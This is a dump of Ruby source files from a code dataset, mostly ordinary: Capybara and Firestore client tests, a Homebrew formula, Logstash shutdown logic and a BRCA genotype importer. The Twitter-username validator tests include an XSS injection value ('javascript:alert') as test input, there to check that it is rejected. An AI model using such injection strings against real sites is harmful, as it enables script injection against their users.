hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
5d2ebb9a20f66e53e103a72f2000ffdd071aa929 | 1,075 | # frozen_string_literal: true
# Shared spec for Capybara's Element#has_style? / have_style matcher.
# Exercised against the /with_html fixture; assumes #first renders with
# display: block and #second with display: inline — verify in the fixture.
Capybara::SpecHelper.spec '#has_style?', requires: [:css] do
  before do
    @session.visit('/with_html')
  end
  # Both symbol and string style keys are accepted.
  it "should be true if the element has the given style" do
    expect(@session.find(:css, '#first')).to have_style(display: 'block')
    expect(@session.find(:css, '#first').has_style?(display: 'block')).to be true
    expect(@session.find(:css, '#second')).to have_style('display' => 'inline')
    expect(@session.find(:css, '#second').has_style?('display' => 'inline')).to be true
  end
  it "should be false if the element does not have the given style" do
    expect(@session.find(:css, '#first').has_style?('display' => 'inline')).to be false
    expect(@session.find(:css, '#second').has_style?(display: 'block')).to be false
  end
  # Style values may also be matched with a Regexp instead of an exact string.
  it "allows Regexp for value matching" do
    expect(@session.find(:css, '#first')).to have_style(display: /^bl/)
    expect(@session.find(:css, '#first').has_style?('display' => /^bl/)).to be true
    expect(@session.find(:css, '#first').has_style?(display: /^in/)).to be false
  end
end
| 41.346154 | 87 | 0.663256 |
ed493bdd88268a30ef59a4b69bcbf1986a5df927 | 6,324 | # coding: utf-8
require 'test_helper'
ActiveValidators.activate(:twitter)
# Specs for the ActiveValidators :twitter validator in its three formats:
# bare username (validates ... :twitter => true), :format => :url and
# :format => :username_with_at.
describe "Twitter Validation" do
  # Re-registers the validator on TestRecord with the given format option
  # and returns a fresh record. Callbacks are reset so each example sees
  # only its own validator.
  def build_twitter_record format, attrs = {}
    TestRecord.reset_callbacks(:validate)
    TestRecord.validates :twitter_username, :twitter => format
    TestRecord.new attrs
  end
  it "rejects invalid urls" do
    subject = build_twitter_record true
    _(subject.valid?).must_equal(false)
    _(subject.errors.size).must_equal(1)
  end
  it "generates an error message of type blank" do
    subject = build_twitter_record true
    _(subject.valid?).must_equal(false)
    message = subject.errors.generate_message(:twitter_username, :blank)
    _(subject.errors[:twitter_username].include?(message)).must_equal(true)
  end
  # Full profile URLs: only http/https, optional www, 1-15 valid characters.
  describe "for twitter url validator" do
    it "validates with http" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://twitter.com/garrettb'
      _(subject.valid?).must_equal(true)
    end
    it "validates with https protocol" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'https://twitter.com/garrettb'
      _(subject.valid?).must_equal(true)
    end
    it "generate error with ftp protocol" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'ftp://twitter.com/garrettb'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "validates with www and http" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://www.twitter.com/garrettb'
      _(subject.valid?).must_equal(true)
    end
    it "generate error without www dot" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://wwwtwitter.com/garrettb'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error without no username" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://twitter.com'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error without no username and trailing slash" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://twitter.com/'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with too long of username" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://twitter.com/garrettbjerkhoelwashere'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with invalid character" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = 'http://twitter.com/garrettbjerkhoé'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    # Multiline input must not pass validation (guards against ^/$ anchors).
    it "generates error with injected content" do
      subject = build_twitter_record :format => :url
      subject.twitter_username = "javascript:alert('xss');\nhttp://twitter.com/garrettbjerkhoelwashere"
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
  end
  # "@handle" form: a leading @ followed by 1-15 valid characters.
  describe "for twitter at sign validator" do
    it "validate with valid username" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = '@garrettb'
      _(subject.valid?).must_equal(true)
    end
    it "validate with one character" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = '@a'
      _(subject.valid?).must_equal(true)
    end
    it "generate error with too long of username" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = '@garrettbjerkhoelwashere'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with no username" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = '@'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with invalid character" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = '@érik'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with injected content" do
      subject = build_twitter_record :format => :username_with_at
      subject.twitter_username = "injected\n@erik"
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
  end
  # Default/bare-username form: no @, no URL, 1-15 valid characters.
  describe "for twitter without at sign validator" do
    it "validate with valid username" do
      subject = build_twitter_record true
      subject.twitter_username = 'garrettb'
      _(subject.valid?).must_equal(true)
    end
    it "validate with one character" do
      subject = build_twitter_record true
      subject.twitter_username = 'a'
      _(subject.valid?).must_equal(true)
    end
    it "generate error with too long of username" do
      subject = build_twitter_record true
      subject.twitter_username = 'garrettbjerkhoelwashere'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with no username" do
      subject = build_twitter_record true
      subject.twitter_username = ''
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with invalid character" do
      subject = build_twitter_record true
      subject.twitter_username = 'érik'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with at sign character" do
      subject = build_twitter_record true
      subject.twitter_username = '@garrettb'
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
    it "generate error with at injected data" do
      subject = build_twitter_record true
      subject.twitter_username = "something\ngarrettb\nelse"
      _(subject.valid?).must_equal(false)
      _(subject.errors.size).must_equal(1)
    end
  end
end
| 34 | 103 | 0.694497 |
b9860f2834efb6f551395000b6cf8e56dcde01d5 | 2,204 | class H2o < Formula
  # Homebrew formula for the H2O HTTP server (v0.9.2).
  homepage "https://github.com/h2o/h2o/"
  url "https://github.com/h2o/h2o/archive/v0.9.2.tar.gz"
  sha1 "001f5aefcd829467ed64b328ff0d35b736593dec"
  head "https://github.com/h2o/h2o.git"

  bottle do
    sha1 "3a661417da4cf981935b3ec39a9e0401ce0cfb30" => :yosemite
    sha1 "046477212770943f9e039fb73608d393cb5d6c61" => :mavericks
    sha1 "1e4bf69b5e1f81c0b5c1bca54928643b613f312c" => :mountain_lion
  end

  option "with-libuv", "Build the H2O library in addition to the executable."

  depends_on "cmake" => :build
  depends_on "libyaml"
  depends_on "openssl"
  depends_on "libuv" => :optional

  def install
    system "cmake", ".", *std_cmake_args
    # The static library target is separate from the default executable build.
    if build.with? "libuv"
      system "make", "libh2o"
      lib.install "libh2o.a"
    end
    system "make", "install"
    mkdir_p etc/"h2o"
    mkdir_p var/"h2o"
    (var+"h2o").install "examples/doc_root/index.html"
    # Write up a basic example conf for testing.
    (buildpath+"brew/h2o.conf").write conf_example
    (etc+"h2o").install buildpath/"brew/h2o.conf"
  end

  # This is simplified from examples/h2o/h2o.conf upstream.
  # NOTE(review): heredoc indentation below was reconstructed — the YAML
  # nesting must match upstream for the config to parse; verify.
  def conf_example; <<-EOS.undent
    listen: 8080
    hosts:
      "127.0.0.1.xip.io:8080":
        paths:
          /:
            file.dir: #{var}/h2o/
    EOS
  end

  def caveats; <<-EOS.undent
    A basic example configuration file has been placed in #{etc}/h2o.

    You can find fuller, unmodified examples here:
      https://github.com/h2o/h2o/tree/master/examples/h2o
    EOS
  end

  plist_options :manual => "h2o"

  # launchd plist: keeps h2o running with the example config from #{etc}/h2o.
  def plist; <<-EOS.undent
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
      <dict>
        <key>Label</key>
        <string>#{plist_name}</string>
        <key>RunAtLoad</key>
        <true/>
        <key>KeepAlive</key>
        <true/>
        <key>ProgramArguments</key>
        <array>
          <string>#{opt_bin}/h2o</string>
          <string>-c</string>
          <string>#{etc}/h2o/h2o.conf</string>
        </array>
      </dict>
    </plist>
    EOS
  end

  test do
    system bin/"h2o", "--version"
  end
end
| 26.238095 | 106 | 0.624319 |
bf29c8671ecaae8cf5d7e51e9fe5946e40b6f7a6 | 418 | require_dependency 'core/application_record'
module Core
  module SocialWork
    # Record of an interaction within a social-work project, with up to two
    # attached documents.
    class ProjectInteraction < ApplicationRecord
      # Table lives in the non-default 'generic' schema.
      self.table_name = 'generic.social_work_project_interactions'
      # Virtual (non-persisted) attribute; set by callers/forms.
      # NOTE(review): this shadows any 'type' column ActiveRecord would use
      # for STI — confirm that is intentional.
      attr_accessor :type
      belongs_to :candidate_project
      # CarrierWave uploaders for the two optional attachments.
      mount_uploader :document_one, Core::SocialWork::DocumentUploader
      mount_uploader :document_two, Core::SocialWork::DocumentUploader
    end
  end
end
| 26.125 | 70 | 0.77512 |
abce111eeef86bb3145efc36167f46918976601b | 3,483 | # encoding: utf-8
require "concurrent/atomic/atomic_fixnum"
require "concurrent/atomic/atomic_boolean"
module LogStash
  # Watches a pipeline while it shuts down: samples inflight/thread reports
  # on a fixed interval, logs progress periodically, and — when unsafe
  # shutdown is enabled — force-exits the process if shutdown stalls.
  class ShutdownWatcher
    include LogStash::Util::Loggable

    CHECK_EVERY = 1 # second
    REPORT_EVERY = 5 # checks
    ABORT_AFTER = 3 # stalled reports

    attr_reader :cycle_period, :report_every, :abort_threshold

    # @param pipeline        pipeline under shutdown; must expose #thread and #reporter
    # @param cycle_period    seconds between checks
    # @param report_every    checks per logged report (also the report window size)
    # @param abort_threshold stalled reports tolerated before force-exit
    def initialize(pipeline, cycle_period=CHECK_EVERY, report_every=REPORT_EVERY, abort_threshold=ABORT_AFTER)
      @pipeline = pipeline
      @cycle_period = cycle_period
      @report_every = report_every
      @abort_threshold = abort_threshold
      @reports = []
      @attempts_count = Concurrent::AtomicFixnum.new(0)
      @running = Concurrent::AtomicBoolean.new(false)
    end

    # Class-level flag (class instance variable): when true, a stalled
    # shutdown is allowed to force-exit the process.
    def self.unsafe_shutdown=(boolean)
      @unsafe_shutdown = boolean
    end

    def self.unsafe_shutdown?
      @unsafe_shutdown
    end

    # Convenience: build a watcher and run it on a background thread.
    # NOTE(review): the block parameter shadows the local `controller`
    # (harmless here, but triggers a verbose-mode warning).
    def self.start(pipeline, cycle_period=CHECK_EVERY, report_every=REPORT_EVERY, abort_threshold=ABORT_AFTER)
      controller = self.new(pipeline, cycle_period, report_every, abort_threshold)
      Thread.new(controller) { |controller| controller.start }
    end

    def logger
      self.class.logger
    end

    # Number of check cycles performed so far (thread-safe).
    def attempts_count
      @attempts_count.value
    end

    def stop!
      @running.make_false
    end

    def stopped?
      @running.false?
    end

    # Main loop. Exits when stopped externally, when the pipeline thread
    # dies, or (unsafe mode) via force_exit after ABORT_AFTER stalled reports.
    def start
      sleep(@cycle_period)
      cycle_number = 0
      stalled_count = 0
      running!
      Stud.interval(@cycle_period) do
        @attempts_count.increment
        break if stopped?
        break unless @pipeline.thread.alive?
        @reports << pipeline_report_snapshot
        @reports.delete_at(0) if @reports.size > @report_every # expire old report
        if cycle_number == (@report_every - 1) # it's report time!
          logger.warn(@reports.last.to_s)
          if shutdown_stalled?
            logger.error("The shutdown process appears to be stalled due to busy or blocked plugins. Check the logs for more information.") if stalled_count == 0
            stalled_count += 1
            if self.class.unsafe_shutdown? && @abort_threshold == stalled_count
              logger.fatal("Forcefully quitting logstash..")
              force_exit()
              break
            end
          else
            # Progress resumed; reset the stall counter.
            stalled_count = 0
          end
        end
        cycle_number = (cycle_number + 1) % @report_every
      end
    ensure
      stop!
    end

    def pipeline_report_snapshot
      @pipeline.reporter.snapshot
    end

    # A pipeline shutdown is stalled if
    # * at least REPORT_EVERY reports have been created
    # * the inflight event count is in monotonically increasing
    # * there are worker threads running which aren't blocked on SizedQueue pop/push
    # * the stalled thread list is constant in the previous REPORT_EVERY reports
    def shutdown_stalled?
      return false unless @reports.size == @report_every #
      # is stalled if inflight count is either constant or increasing
      stalled_event_count = @reports.each_cons(2).all? do |prev_report, next_report|
        prev_report.inflight_count <= next_report.inflight_count
      end
      if stalled_event_count
        @reports.each_cons(2).all? do |prev_report, next_report|
          prev_report.stalling_threads == next_report.stalling_threads
        end
      else
        false
      end
    end

    # Hard process exit; extracted so tests can stub it.
    def force_exit
      exit(-1)
    end

    private

    def running!
      @running.make_true
    end
  end
end
| 28.785124 | 161 | 0.664944 |
79668e029d1b9d3ace8b4cd61331cb4fc444811a | 852 | module Lol
# Holds the representation of a MiniSeries
class MiniSeries < Model
# @!attribute [r] target
# @return [String] number of games required to advance
attr_reader :target
# @!attribute [r] wins
# @return [Fixnum] wins in the miniseries
attr_reader :wins
# @!attribute [r] losses
# @return [Fixnum] losses in the miniseries
attr_reader :losses
# @!attribute [r] time_left_to_play_millis
# @return [Fixnum] time left to play the miniseries, expressed in milliseconds
attr_reader :time_left_to_play_millis
# @!attribute [r] progress
# @return [String] string representation of the miniseries progress.
# i.e. "WLN" (Win / Loss / Not played)
attr_reader :progress
private
attr_writer :target, :wins, :losses, :time_left_to_play_millis, :progress
end
end
| 28.4 | 82 | 0.681925 |
f793ca305b64dffd1997efe0508797f5390c618e | 190 | FactoryGirl.define do
factory :user, :class => Mtwarden::User do
sequence(:email) { |n| "test#{n}@example.com" }
password "password"
password_confirmation "password"
end
end
| 23.75 | 51 | 0.678947 |
613b78bafd1d85445714d4bd010fc80b7cbf3c50 | 280 | Erp::Backend::Engine.routes.draw do
root to: "frontend/home#index", as: "home"
get "/products", to: "frontend/products#index", as: :products
get "/products/:id", to: "frontend/products#detail", as: :product_detail
get "/blogs", to: "frontend/blogs#index", as: :blogs
end
| 35 | 74 | 0.685714 |
211e2a41b5dd3839ac98e47680da8788990d4c00 | 717 | capitais = Hash.new
# Demonstration of basic Hash operations using Brazilian state capitals.
capitais = { acre: 'Rio Branco', sao_paulo: 'São Paulo' }

# Reusable dumper for the keys/values sections; output matches the original
# script byte for byte (including the leading blank lines).
mostra_chaves_e_valores = lambda do |hash|
  puts "\n"
  puts 'chaves:'
  puts hash.keys
  puts "\n"
  puts 'values:'
  puts hash.values
end

# Add a new pair, then dump the hash, its keys and its values.
capitais[:minas_gerais] = 'Belo Horizonte'
puts capitais
mostra_chaves_e_valores.call(capitais)

# Remove an entry and dump everything again.
capitais.delete(:acre)
puts 'Depois de deletar:'
puts capitais
mostra_chaves_e_valores.call(capitais)

# Single lookup, element count and emptiness check.
puts "\n"
puts capitais[:sao_paulo]
puts capitais.size
puts capitais.empty?
| 16.674419 | 57 | 0.709902 |
1cd6aba3249c85cfab93659c7e00f4cd1b040a2b | 198 | require 'test_helper'
class CoolrTest < Minitest::Test
  # Smoke test: the gem must expose a version constant.
  def test_that_it_has_a_version_number
    refute_nil ::Coolr::VERSION
  end

  # Deliberately failing placeholder (standard `bundle gem` scaffold) —
  # replace with a real behaviour test.
  def test_it_does_something_useful
    assert false
  end
end
| 16.5 | 39 | 0.777778 |
1afa801470aaa4408c63603e3c294247dd9f08f6 | 1,140 | # frozen_string_literal: true
module CscCore
  module ExcelBuilders
    # Writes one spreadsheet row per raised indicator of each scorecard,
    # preceded by a localized header row.
    class ProposedIndicatorExcelBuilder
      attr_accessor :sheet

      # @param sheet      spreadsheet sheet responding to #add_row
      # @param scorecards scorecard relation (eager-loads :raised_indicators)
      def initialize(sheet, scorecards)
        @sheet = sheet
        @scorecards = scorecards
      end

      # Renders the header followed by every scorecard's indicator rows.
      def build
        build_header
        @scorecards.includes(:raised_indicators).each { |card| build_row(card) }
      end

      # Emits the localized column titles.
      def build_header
        sheet.add_row [
          I18n.t("excel.scorecard_id"),
          I18n.t("excel.participant_id"),
          I18n.t("excel.indicator_id"),
          I18n.t("excel.seleted_for_implementation")
        ]
      end

      # Emits one row per raised indicator, ordered by participant uuid.
      def build_row(scorecard)
        ordered = scorecard.raised_indicators.sort_by(&:participant_uuid)
        ordered.each { |indicator| sheet.add_row generate_row(indicator, scorecard) }
      end

      private

      # Assembles the cell values for a single raised indicator.
      def generate_row(raised_indicator, scorecard)
        [
          scorecard.uuid,
          raised_indicator.participant_uuid,
          raised_indicator.indicator_uuid,
          raised_indicator.selected?
        ]
      end
    end
  end
end
| 23.75 | 90 | 0.616667 |
e99aa0595095e9303600e77f6b4d62f0a6a79a3f | 384 | # encoding: utf-8
class CsvUtils
  # Convenience wrapper: returns the header (first) row of a CSV file.
  #
  # @param path  [String]  file to read
  # @param sep   [String]  column separator (defaults to ',')
  # @param debug [Boolean] when true, pretty-prints the row before returning
  # @return the parsed header row, as produced by CsvReader.header
  def self.header(path, sep: ',', debug: false)
    header_row = CsvReader.header(path, sep: sep)
    pp header_row if debug
    # e.g.
    # "Country,League,Season,Date,Time,Home,Away,HG,AG,Res,PH,PD,PA,MaxH,MaxD,MaxA,AvgH,AvgD,AvgA\n"
    header_row
  end
end # class CsvUtils
| 22.588235 | 104 | 0.635417 |
39501ca99cafd7d20a87c6e931c9b15c0140852f | 233 | def simple_calculator(nb1, nb2)
addition = nb1 + nb2
substraction = nb1 - nb2
multiplication = nb1 * nb2
division = nb1 / nb2
puts "#{addition}, #{substraction}, #{multiplication}, #{division}"
end
simple_calculator(5, 2)
| 23.3 | 69 | 0.686695 |
03200a9559ac171cec578cb9c90705db9515f2ab | 5,299 | require 'possibly'
module Import
module Brca
module Providers
module Salisbury
# Process Salisbury-specific record details into generalized internal genotype format
class SalisburyHandlerDeprecated < Import::Brca::Core::ProviderHandler
TEST_SCOPE_MAPPING = { 'breast cancer full screen' => :full_screen,
'breast cancer full screen data only' => :full_screen,
'brca mainstreaming' => :full_screen,
'breast cancer predictives' => :targeted_mutation,
'brca mlpa only' => :targeted_mutation,
'brca ashkenazi mutations' => :aj_screen } .freeze
TEST_TYPE_MAPPING = { 'breast cancer full screen' => :diagnostic,
'breast cancer full screen data only' => :diagnostic,
'brca mainstreaming' => :diagnostic,
'brca mlpa only' => :predictive,
'breast cancer predictives' => :predictive,
'brca ashkenazi mutations' => nil } .freeze
PASS_THROUGH_FIELDS = %w[age consultantcode
servicereportidentifier
providercode
authoriseddate
requesteddate].freeze
POSITIVE_TEST = /variant|pathogenic|deletion/i.freeze
FAILED_TEST = /Fail*+/i.freeze
GENE_REGEX = /B(?:R)?(?:C)?(?:A)?(1|2)(?:_(\d*[A-Z]*))?/i.freeze
GENE_LOCATION_REGEX = /.*c\.(?<gene>[^ ]+)(?: p\.\((?<protein>.*)\))?.*/i.freeze
EXON_LOCATION_REGEX = /exons? (\d+[a-z]*(?: ?- ?\d+[a-z]*)?)/i.freeze
# TODO: make this more conservative
DEL_DUP_REGEX = /(?:\W*(del)(?:etion|[^\W])?)|(?:\W*(dup)(?:lication|[^\W])?)/i.freeze
def initialize(batch)
super
@logger.level = Logger::INFO
end
def process_fields(record)
genotype = Import::Brca::Core::Genotype.new(record)
extract_gene(record.raw_fields['test'], genotype)
extract_variant(record.raw_fields['genotype'], genotype)
Maybe(record.raw_fields['moleculartestingtype']).each do |ttype|
genotype.add_molecular_testing_type_strict(TEST_TYPE_MAPPING[ttype])
scope = TEST_SCOPE_MAPPING[ttype.downcase.strip]
genotype.add_test_scope(scope) if scope
end
extract_teststatus(genotype, record)
add_organisationcode_testresult(genotype)
genotype.add_specimen_type(record.mapped_fields['specimentype'])
genotype.add_received_date(record.raw_fields['date of receipt'])
genotype.add_passthrough_fields(record.mapped_fields,
record.raw_fields,
PASS_THROUGH_FIELDS)
@persister.integrate_and_store(genotype)
end
def add_organisationcode_testresult(genotype)
genotype.attribute_map['organisationcode_testresult'] = '699H0'
end
def extract_gene(test_string, genotype)
if test_string.scan(GENE_REGEX).size > 1
@logger.error "Multiple genes detected in input string: #{test_string};"\
'record will be incomplete!'
end
Maybe(GENE_REGEX.match(test_string)).
map { |match| match[1].to_i }.
map { |gene| genotype.add_gene(gene) }.
or_else { @logger.error "Cannot extract gene name from raw test: #{test_string}" }
end
def extract_teststatus(genotype, record)
if POSITIVE_TEST.match(record.raw_fields['status'])
genotype.add_status(:positive)
@logger.debug "POSITIVE status for : #{record.raw_fields['status']}"
elsif FAILED_TEST.match(record.raw_fields['status'])
genotype.add_status(:failed)
@logger.debug "FAILED status for : #{record.raw_fields['status']}"
else genotype.add_status(:negative)
end
end
def extract_variant(genotype_string, genotype)
matches = GENE_LOCATION_REGEX.match(genotype_string)
exon_matches = EXON_LOCATION_REGEX.match(genotype_string)
if genotype_string.blank?
genotype.set_negative # TODO: what is the desired value to put in here? Negative?
return
end
if matches
genotype.add_gene_location(matches[:gene]) if matches[1]
genotype.add_protein_impact(matches[:protein]) if matches[2]
elsif exon_matches
genotype.add_exon_location(exon_matches[1].delete(' '))
genotype.add_variant_type(genotype_string)
else
@logger.warn "Cannot extract gene location from raw test: #{genotype_string}"
end
end
end
end
end
end
end
| 49.064815 | 96 | 0.543687 |
edf06c9a040dd42500583e3c447511678fbec1f4 | 4,287 | require 'json-schema'
module GeoConcerns
  module Discovery
    # Renders discovery metadata as a GeoBlacklight document (hash or JSON),
    # validating the result against the bundled GeoBlacklight JSON schema.
    class GeoblacklightDocument < AbstractDocument
      # Implements the to_hash method on the abstract document.
      # @param _args [Array<Object>] arguments needed for the renderer, unused here
      # @return [Hash] geoblacklight document as a hash
      def to_hash(_args = nil)
        document
      end

      # Implements the to_json method on the abstract document.
      # @param _args [Array<Object>] arguments needed for the json renderer, unused here
      # @return [String] geoblacklight document as a json string
      def to_json(_args = nil)
        document.to_json
      end

      private

      # Builds the geoblacklight document hash.
      # Field values (id, title, slug, ...) are reader methods inherited
      # from AbstractDocument.
      # @return [Hash] geoblacklight document as a hash
      # rubocop:disable Metrics/MethodLength, Metrics/AbcSize
      def document_hash
        {
          uuid: id,
          dc_identifier_s: identifier,
          dc_title_s: title.first,
          dc_description_s: description,
          dc_rights_s: rights,
          dct_provenance_s: provenance.first,
          dc_creator_sm: creator,
          dc_language_s: language.first,
          dc_publisher_s: publisher.first,
          dc_subject_sm: subject,
          dct_spatial_sm: spatial,
          dct_temporal_sm: temporal,
          layer_slug_s: slug,
          georss_box_s: geo_rss_coverage,
          solr_geom: solr_coverage,
          solr_year_i: layer_year,
          layer_modified_dt: date_modified,
          layer_id_s: wxs_identifier,
          dct_references_s: clean_document(references).to_json,
          layer_geom_type_s: geom_type,
          dc_format_s: process_format_codes(format)
        }
      end
      # rubocop:enable Metrics/MethodLength, Metrics/AbcSize

      # Builds the dct_references hash (URI key -> URL, nils stripped later).
      # @return [Hash] geoblacklight references as a hash
      def references
        {
          'http://schema.org/url' => url,
          'http://www.opengis.net/cat/csw/csdgm' => fgdc,
          'http://www.isotc211.org/schemas/2005/gmd/' => iso19139,
          'http://www.loc.gov/mods/v3' => mods,
          'http://schema.org/downloadUrl' => download,
          'http://schema.org/thumbnailUrl' => thumbnail
        }
      end

      # Returns the geoblacklight rights field based on work visibility.
      # Anything other than public visibility is reported as "Restricted".
      # @return [String] geoblacklight access rights
      def rights
        if access_rights == Hydra::AccessControls::AccessRight::VISIBILITY_TEXT_VALUE_PUBLIC
          'Public'
        else
          'Restricted'
        end
      end

      # Transforms shapfile, tiff, and arc grid format codes into geoblacklight format codes.
      # Unrecognized codes pass through unchanged.
      # @return [String] geoblacklight format codes
      def process_format_codes(format)
        case format
        when 'ESRI Shapefile'
          'Shapefile'
        when 'GTiff'
          'GeoTIFF'
        when 'AIG'
          'ArcGRID'
        else
          format
        end
      end

      # Returns the location of geoblacklight json schema document.
      # @return [String] geoblacklight json schema document path
      def schema
        Rails.root.join('config', 'discovery', 'geoblacklight_schema.json').to_s
      end

      # Validates the geoblacklight document against the json schema.
      # @return [Boolean] is the document valid?
      def valid?(doc)
        JSON::Validator.validate(schema, doc, validate_schema: true)
      end

      # Returns a hash of errors from json schema validation.
      # @return [Hash] json schema validation errors
      def schema_errors(doc)
        { error: JSON::Validator.fully_validate(schema, doc) }
      end

      # Cleans the geoblacklight document hash by removing unused fields,
      # then validates it again a json schema. If there are errors, an
      # error hash is returned, otherwise, the cleaned doc is returned.
      # Note: validation failures are reported via the return value, not raised.
      # @return [Hash] geoblacklight document hash or error hash
      def document
        clean = clean_document(document_hash)
        if valid?(clean)
          clean
        else
          schema_errors(clean)
        end
      end
    end
  end
end
| 34.853659 | 95 | 0.606018 |
874595aa9344f2f1de16f2866255f780646e5353 | 203 | class Question < ActiveRecord::Base
attr_accessible :content, :survey_id, :answers_attributes
belongs_to :survey
has_many :answers
accepts_nested_attributes_for :answers, allow_destroy: true
end
| 29 | 61 | 0.812808 |
91e36bba73ef33e8815ac9512c2046f0ad38235c | 198 | # frozen_string_literal: true
class RenameTypeToMenuItemType < ActiveRecord::Migration[6.1]
  # Renames menu_items.type to menu_item_type ("type" is reserved by
  # ActiveRecord for single-table inheritance). Reversible.
  def change
    rename_column :menu_items, :type, :menu_item_type
  end
end
| 19.8 | 61 | 0.732323 |
33d7de391cbaa98a013483c4d9e4933b12e4d2dd | 48,730 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/firestore/v1/firestore_pb"
require "google/firestore/v1/firestore_services_pb"
require "google/cloud/firestore/v1/firestore"
class ::Google::Cloud::Firestore::V1::Firestore::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_get_document
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::Document.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
mask = {}
transaction = "hello world"
get_document_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_document, name
assert_kind_of ::Google::Cloud::Firestore::V1::GetDocumentRequest, request
assert_equal "hello world", request["name"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
refute_nil options
end
Gapic::ServiceStub.stub :new, get_document_client_stub do
# Create client
client = ::Google::Cloud::Firestore::V1::Firestore::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_document({ name: name, mask: mask, transaction: transaction }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_document name: name, mask: mask, transaction: transaction do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_document ::Google::Cloud::Firestore::V1::GetDocumentRequest.new(name: name, mask: mask, transaction: transaction) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_document({ name: name, mask: mask, transaction: transaction }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_document ::Google::Cloud::Firestore::V1::GetDocumentRequest.new(name: name, mask: mask, transaction: transaction), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_document_client_stub.call_rpc_count
end
end
def test_list_documents
# Create GRPC objects.
grpc_response = ::Google::Cloud::Firestore::V1::ListDocumentsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
collection_id = "hello world"
page_size = 42
page_token = "hello world"
order_by = "hello world"
mask = {}
transaction = "hello world"
show_missing = true
list_documents_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_documents, name
assert_kind_of ::Google::Cloud::Firestore::V1::ListDocumentsRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["collection_id"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
assert_equal "hello world", request["order_by"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Firestore::V1::DocumentMask), request["mask"]
assert_equal "hello world", request["transaction"]
assert_equal :transaction, request.consistency_selector
